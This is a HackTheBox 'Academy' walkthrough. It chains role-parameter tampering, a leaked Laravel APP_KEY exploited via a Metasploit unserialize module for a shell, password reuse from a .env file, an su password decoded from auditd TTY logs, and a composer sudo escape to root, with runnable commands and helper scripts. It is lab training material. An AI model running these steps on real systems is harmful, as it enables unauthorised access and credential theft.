HackTheBox: (“Academy”) — Walkthrough

Mohamed Elmasry
4 min read · Feb 27, 2021

Hi people :D

Today we’ll solve the “Academy” machine from HackTheBox, an easy machine with some good ideas. Let’s get started.

Info

Enumeration

— — — — — — —

Start with an Nmap scan

nmap -A 10.10.10.215

We have two open ports, 22 (SSH) and 80 (HTTP). Add the machine IP to /etc/hosts as academy.htb.

Web Enumeration

— — — — — — — —

Now go to your browser and navigate to http://academy.htb

There is a register function, so let’s open Burp Suite with intercept on and create an account

In the intercepted registration request I noticed a roleid parameter. If you are familiar with web pentesting you know that parameters like this are often vulnerable to a parameter-based access control bypass: the server trusts a role value that the client controls.

Change the roleid value to 1, forward the request, then log in with your account
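As an added example (mine, not part of the original write-up), here is the same tamper done from a shell with curl instead of Burp Repeater. It assumes the form posts to /register.php with the fields uid, password, confirm and roleid (default 0); those names are assumptions, so read them from your own intercepted request. The set_form_param helper is generic and rewrites or appends any parameter in a URL-encoded body.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# Re-send the registration request with the client-supplied roleid changed,
# from the command line instead of Burp Repeater.
# Assumed (check your intercepted request): the form posts to /register.php
# with fields uid, password, confirm and roleid, and roleid defaults to 0.

# Rewrite one key=value pair in an application/x-www-form-urlencoded body,
# or append it when the parameter is absent. Values must already be
# URL-encoded (no raw "&" or "/").
set_form_param() {
  body="&$1"; key=$2; value=$3        # leading "&" so every pair starts with "&key="
  case "$body" in
    *"&$key="*) body=$(printf '%s' "$body" | sed "s/&$key=[^&]*/\&$key=$value/") ;;
    *)          body="$body&$key=$value" ;;
  esac
  printf '%s' "${body#&}"              # drop the helper "&" again
}

# POST the tampered registration. Set PROXY=http://127.0.0.1:8080 to route it
# through Burp so the request shows up in the proxy history.
register_with_role() {
  target=$1; user=$2; pass=$3; role=$4
  body=$(set_form_param "uid=$user&password=$pass&confirm=$pass&roleid=0" roleid "$role")
  # shellcheck disable=SC2086  # ${PROXY:-} is meant to vanish when unset
  curl -s -o /dev/null -w '%{http_code}\n' ${PROXY:+-x} ${PROXY:-} \
       -d "$body" "$target/register.php"
}

# Usage (needs the box reachable, so not run here):
#   register_with_role http://academy.htb attacker 'Passw0rd' 1
# then log in as attacker / Passw0rd and you land on the privileged view.
```

The underlying flaw is server-side: a role must be assigned by the application when it creates the account, never copied from a form field the client can edit.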

After login you’ll be redirected to a page that looks like the real HackTheBox Academy site. Run any directory brute-forcing tool, such as dirsearch, and you’ll find an admin directory

./dirsearch.py -u http://academy.htb/ -e "*" -x 500-599,400-499

Navigate to the admin directory and you will find useful information, such as a dev subdomain and two usernames (cry0l1t3 and mrb3n)

Add dev-staging-01.academy.htb to /etc/hosts as well, then browse to it

Scroll down a bit: the page shows that the site runs Laravel, and further down it exposes the application’s environment variables, including the APP_KEY

Exploitation

— — — — — —

I searched for Laravel exploits and found this Metasploit module. The leaked APP_KEY is what makes it work: Laravel uses that key to encrypt and sign its tokens, so with the key an attacker can craft an encrypted payload that the application decrypts and unserializes, and the module turns that into code execution

Let’s try this module. First set the module options, then run it

  use exploit/unix/http/laravel_token_unserialize_exec
  set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
  set RHOSTS 10.10.10.215
  set VHOST dev-staging-01.academy.htb
  set LHOST tun0
  exploit

And we got a www-data shell ☺

User Flag

— — — — —

Upgrade the shell to a proper TTY with:

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=linux

then run ls -la to show hidden files. There is a .env file in the web root, so let’s read it

It holds the application’s credentials, including the password mySup3rP4s5w0rd!!. Try that password for the cry0l1t3 user (with su, or over SSH) and it works: credential reuse gets us a shell as cry0l1t3

Simply go to the home directory and read user.txt to get the flag

Root Flag

— — — — —

Unfortunately, we cannot run sudo -l with this user’s privileges

After some searching, I found four log files in the /var/log/audit directory that our user is allowed to read

These files contain a huge amount of data, and reading them by hand is a waste of time, so I grepped for interesting strings such as password, pass, admin, sudo, su, etc.

I noticed that the records carry a comm= field holding the name of the command that was run, e.g. comm="whoami". Grepping on comm= values made the search much faster

After trying a few strings, grepping for comm="su" turned up a record with hex-encoded data:

6D7262336E5F41634064336D79210A

Decode the hex to ASCII, locally with xxd or any online converter (bear in mind that pasting real credentials into a third-party site is rarely a good idea)

It decodes to mrb3n_Ac@d3my!, which looks like a password typed at a su prompt, most likely mrb3n’s. Switch to mrb3n with it
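As an added example (mine, not the author’s), here is how to pull those keystroke records out of audit.log and decode them with POSIX tools only, for any command name rather than just su. The audit lines embedded below are constructed to look like /var/log/audit/audit.log records; only the su record carries the hex string from above. Two caveats: auditd only records keystrokes in TTY records when pam_tty_audit is enabled for the user, which is why a password typed into su ended up in the log at all, and when the audit tools are installed aureport --tty will decode these records for you.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# Extract and decode the keystrokes auditd stored for a given command name
# from TTY records ("type=TTY ... comm=\"su\" data=<hex>").

# Constructed sample of /var/log/audit/audit.log lines. The su record
# carries the hex string from the write-up; the others are decoys.
audit_sample() {
  cat <<'EOF'
type=USER_AUTH msg=audit(1597199293.000:80): pid=2500 uid=1002 auid=1002 ses=1 msg='op=PAM:authentication acct="cry0l1t3" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=failed'
type=TTY msg=audit(1597199293.500:83): tty pid=2510 uid=1002 auid=1002 ses=1 major=4 minor=1 comm="bash" data=6C73202D6C610A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=1002 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
EOF
}

# Decode a hex string to ASCII without xxd: two hex digits at a time,
# converted to an octal escape that POSIX printf understands. Trailing
# newline bytes are dropped by the command substitution, which is what
# we want here: the 0A at the end of a TTY record is just the Enter key.
hex2ascii() {
  hex=$1
  case ${#hex} in *[13579]) echo "odd-length hex string" >&2; return 1 ;; esac
  out=""
  while [ -n "$hex" ]; do
    byte=${hex%"${hex#??}"}            # first two characters
    hex=${hex#??}                      # the rest
    out="$out$(printf "\\$(printf '%03o' "$((0x$byte))")")"
  done
  printf '%s' "$out"
}

# Read an audit log on stdin and print the decoded keystrokes of every
# TTY record whose comm= matches $1 (e.g. su), one record per line.
# On the box: tty_input_for su < /var/log/audit/audit.log
tty_input_for() {
  cmd=$1
  grep 'type=TTY ' | grep "comm=\"$cmd\"" \
    | sed -n 's/.*data=\([0-9A-Fa-f]*\).*/\1/p' \
    | while read -r hexdata; do
        hex2ascii "$hexdata"
        printf '\n'
      done
}

# Demo on the constructed sample; prints the su keystrokes only.
demo() {
  audit_sample | tty_input_for su
}
```

Running demo prints mrb3n_Ac@d3my!, the password mrb3n typed into su; the bash record decodes to the harmless ls -la, which is why filtering on comm= pays off.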

Now, as mrb3n, run sudo -l

We can run composer as root without a password.
Whenever I know what I can run as root I go straight to GTFOBins; its sudo entry for composer gives the commands below. Composer executes the script entries in composer.json through the shell, so when it runs under sudo the x script spawns /bin/sh as root.

Just copy & paste them:

  TF=$(mktemp -d)
  echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
  sudo composer --working-dir=$TF run-script x

After that we get a root shell. Simply read root.txt and congrats! ☺

Thanks for reading, I hope this writeup was useful to you ❤


Digital Forensics Investigator | CTF player and creator | SOC Analyst | Threat Hunter